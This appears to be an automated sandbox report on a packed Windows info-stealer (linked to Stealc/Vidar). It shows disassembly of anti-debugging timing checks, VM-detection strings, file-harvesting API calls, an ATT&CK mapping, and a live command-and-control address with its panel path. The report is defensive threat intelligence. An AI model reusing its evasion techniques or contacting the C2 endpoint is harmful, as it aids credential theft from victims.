Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129740B second address: 129744A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jp 00007F5C21209546h 0x0000000f jmp 00007F5C21209550h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5C21209556h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129744A second address: 129744E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 129744E second address: 1297457 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1297457 second address: 1297464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5C20C5AC36h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 1297464 second address: 1297477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F5C21209546h 0x00000009 pushad 0x0000000a popad 0x0000000b jo 00007F5C21209546h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A7174 second address: 12A7178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A7BD9 second address: 12A7C07 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5C21209552h 0x00000008 jc 00007F5C21209548h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F5C2120954Eh 0x0000001a jc 00007F5C21209546h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A7C07 second address: 12A7C11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F5C20C5AC36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12A7EB1 second address: 12A7EB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12AF436 second address: 12AF43C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12AF43C second address: 12AF440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12AF440 second address: 12AF444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12AF444 second address: 12AF491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5C21209551h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnp 00007F5C21209552h 0x00000018 jl 00007F5C2120954Ch 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F5C21209557h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12AF491 second address: 12AF495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12AF495 second address: 12AF49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12AF49B second address: 12AF4A5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5C20C5AC3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12B0DDF second address: 12B0E06 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5C2120954Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5C21209552h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 12B0E06 second address: 12B0E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 16404A3 second address: 16404A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 16404A9 second address: 16404DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5C20C5AC48h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 pushad 0x00000012 movzx ecx, di 0x00000015 mov ah, bh 0x00000017 popad 0x00000018 mov dl, ch 0x0000001a popad 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 16404DE second address: 16404E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 16404E2 second address: 16404E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1640545 second address: 164054B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 164054B second address: 1640564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5C20C5AC3Ch 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1640564 second address: 1640573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5C2120954Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1BAA second address: 11D1BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D1DA4 second address: 11D1DAE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5C21209546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11C40A4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11EB851 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11CD6E4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-37668
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D440F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00D440F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00D3E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D447C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00D447C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D31710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D31710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D44B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D43B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00D43B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00D3EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D31160 GetSystemInfo,ExitProcess,0_2_00D31160
                Source: file.exe, file.exe, 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1765760995.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1765760995.00000000016D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36484
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36495
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36481
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36503
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36369
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36535
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D34610 VirtualProtect ?,00000004,00000100,000000000_2_00D34610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D49BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49AA0 mov eax, dword ptr fs:[00000030h]0_2_00D49AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D47690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00D47690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6828, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00D49790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D498E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00D498E0
                Source: file.exe, file.exe, 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: U|Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D77588 cpuid 0_2_00D77588
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00D47D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D46BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00D46BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D479E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00D479E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D47BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00D47BC0

                Stealing of Sensitive Information

                Source: Yara matchFile source: 0.2.file.exe.d30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1721174254.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6828, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara matchFile source: 0.2.file.exe.d30000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1721174254.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6828, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 334 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php | true | | unknown
                http://185.215.113.206/ | true | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.phpS | file.exe, 00000000.00000002.1765760995.00000000016A4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206 | file.exe, 00000000.00000002.1765760995.000000000165E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.206/6c4adf523b719729.php/( | file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/: | file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/ws | file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/i | file.exe, 00000000.00000002.1765760995.00000000016B7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.php5e | file.exe, 00000000.00000002.1765760995.00000000016A4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.1721174254.000000000539B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1543701
                                    Start date and time:2024-10-28 09:23:19 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 3m 20s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:1
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:file.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 80%
                                    • Number of executed functions: 19
                                    • Number of non-executed functions: 124
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Stop behavior analysis, all processes terminated
                                    • VT rate limit hit for: file.exe
                                    No simulations
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                185.215.113.206 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm | Browse | 185.215.113.206/6c4adf523b719729.php
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206/6c4adf523b719729.php
                                    No context
                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
                | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.206
                | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc | Browse | 185.215.113.16
                | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.206
                | file.exe | Get hash | malicious | LummaC | Browse | 185.215.113.16
                                    No context
                                    No context
                                    No created / dropped files found
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.959318094944891
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:file.exe
                                    File size:2'129'920 bytes
                                    MD5:f522fe27067daea4f7987bf85ec1e287
                                    SHA1:d3179eac21c33134b326721db3eec7b7d1f1ac5f
                                    SHA256:3c60d4aebf5332d3a7fc6ea700f8ab74addba285246ba9cf94968a41cc11480a
                                    SHA512:bd8b7e3b0646b1aee43c00035bcc231e6e1cf63e0f8e43b5519d6a7f8e0ee52e7bb28e5654705ca12d27b3087dc271043403919bcfc00576528ae7cc89d2ac1d
                                    SSDEEP:49152:hdJZShKaSVB9Yo8UmDW9UhXYlgTdlO0uvWNICd35IvA9zMUy2zmRf2T1PzK:zCcr9Yo8VS9UhX4n81d35IWoP2z/z
                                    TLSH:A6A53395DFD0B839CC8E97F76E63539B3735F843EAE7C200BB511A309626A821362D15
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                    Icon Hash:90cececece8e8eb0
                                    Entrypoint:0xb2a000
                                    Entrypoint Section:.taggant
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                    Entrypoint Preview (linear disassembly from the entry point at 0xb2a000; after the initial unconditional jmp the remaining bytes are data, mostly zeros, shown as instructions):
                                    jmp 00007F5C21B7875Ah
                                    divps xmm4, dqword ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add cl, ch
                                    add byte ptr [eax], ah
                                    add byte ptr [eax], al
                                    add byte ptr [edi], al
                                    or al, byte ptr [eax]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], dl
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [ebx], al
